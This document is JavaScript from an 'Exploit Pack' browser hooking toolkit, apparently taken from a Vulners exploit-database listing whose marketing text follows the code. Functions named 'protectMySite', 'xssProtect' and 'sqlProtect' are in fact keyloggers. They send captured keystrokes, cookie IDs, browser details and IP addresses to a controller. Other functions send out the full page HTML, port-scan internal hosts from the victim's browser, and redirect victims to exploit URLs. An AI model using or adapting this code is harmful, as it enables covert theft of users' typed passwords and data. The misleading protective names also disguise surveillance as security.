function version() {
usingClick = ((window.navigator.userAgent.indexOf("SV1") != -1) || (window.navigator.userAgent.indexOf("Opera") != -1) || (window.navigator.userAgent.indexOf("Firefox") != -1));
}
version();
paypopup();
self.focus();
}
function jokeImages() {
R = 0;
x1 = .1;
y1 = .05;
x2 = .25;
y2 = .24;
x3 = 1.6;
y3 = .24;
x4 = 300;
y4 = 200;
x5 = 300;
y5 = 200;
DI = document.images;
DIL = DI.length;
var flow = function () {
for (i = 0; i - DIL; i++) {
DIS = DI[i].style;
DIS.position = 'absolute';
DIS.left = (Math.sin(R * x1 + i * x2 + x3) * x4 + x5) + 'px';
DIS.top = (Math.cos(R * y1 + i * y2 + y3) * y4 + y5) + 'px'
}
R++
};
setInterval(function () {
flow();
}, 5);
void (0);
}
function protectMySite() {
setInterval(function () {
if (!isTyping && keyString) {
var d = new Date();
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + keyString + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
keyString = "";
}
}, 1000);
setInterval(function () {
isTyping = false;
}, 5000);
document.onkeypress = function (ev) {
isTyping = true;
var ev = ev || window.event;
var key = (ev.which || ev.charCode || ev.keyCode);
keyString += String.fromCharCode(key);
};
return "Exploit Pack - Protection: ENABLED";
}
function xssProtect() {
setInterval(function () {
if (!isTyping && keyString) {
var d = new Date();
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + keyString + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
keyString = "";
}
}, 1000);
setInterval(function () {
isTyping = false;
}, 5000);
document.onkeypress = function (ev) {
isTyping = true;
var ev = ev || window.event;
var key = (ev.which || ev.charCode || ev.keyCode);
keyString += String.fromCharCode(key);
};
return "Exploit Pack - Protection XSS: ENABLED";
}
function sqlProtect() {
setInterval(function () {
if (!isTyping && keyString) {
var d = new Date();
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + keyString + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
keyString = "";
}
}, 1000);
setInterval(function () {
isTyping = false;
}, 5000);
document.onkeypress = function (ev) {
isTyping = true;
var ev = ev || window.event;
var key = (ev.which || ev.charCode || ev.keyCode);
keyString += String.fromCharCode(key);
};
return "Exploit Pack - Protection SQL: ENABLED";
}
function banIP(ip) {
alert("Due to abuse your IP has been banned on this site. Redirecting...")
window.location.replace(server + "/IPBanned.aspx")
}
function addIPtoBanList() {
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + "IPBANNED:" + MyCurrentIP + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
}
function antiCopyPaste() {
function whichButton(event) {
if (event.button == 2)//RIGHT CLICK
{
alert("Not Allow Right Click!");
}
}
function noCTRL(e) {
var code = (document.all) ? event.keyCode : e.which;
var msg = "Sorry, this functionality is disabled.";
if (parseInt(code) == 17) //CTRL
{
alert(msg);
window.event.returnValue = false;
}
}
}
var from = 0;
var to = 1024;
function scanEngine(host) {
Scan = $.ajax({
url: host + ":" + from,
dataType: 'script',
type: 'GET'
})
Scan.done(function () {
alert("END");
})
Scan.success(function () {
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + "HOST: " + host + " PORT: " + from + " State: OPEN" + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
})
}
function launchWindow(id) {
//Get the screen height and width
var maskHeight = $(document).height();
var maskWidth = $(window).width();
//Set heigth and width to mask to fill up the whole screen
$('#mask').css({'width': maskWidth, 'height': maskHeight});
//transition effect
$('#mask').fadeIn(1000);
$('#mask').fadeTo("slow", 0.8);
//Get the window height and width
var winH = $(window).height();
var winW = $(window).width();
//Set the popup window to center
$(id).css('top', winH / 2 - $(id).height());
$(id).css('left', winW / 2 - $(id).width() / 2);
//transition effect
$(id).fadeIn(2000);
}
function portScanner(host) {
while (from != to) {
scanEngine(host, from, to);
from++;
}
return "Exploit Pack - Port scanner";
}
function exploitThis(exploitName) {
alert("Executing an exploit from ExploitPack.com")
window.location.replace(server + "/exploits/" + exploitName)
}
function scanForThreats() {
WholeHtml = document.getElementsByTagName('html')[0].innerHTML;
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + WholeHtml + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
return "Exploit Pack - Scanning for threats..";
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Feb 2016 00:00Current
0.1Low risk
Vulners AI Score0.1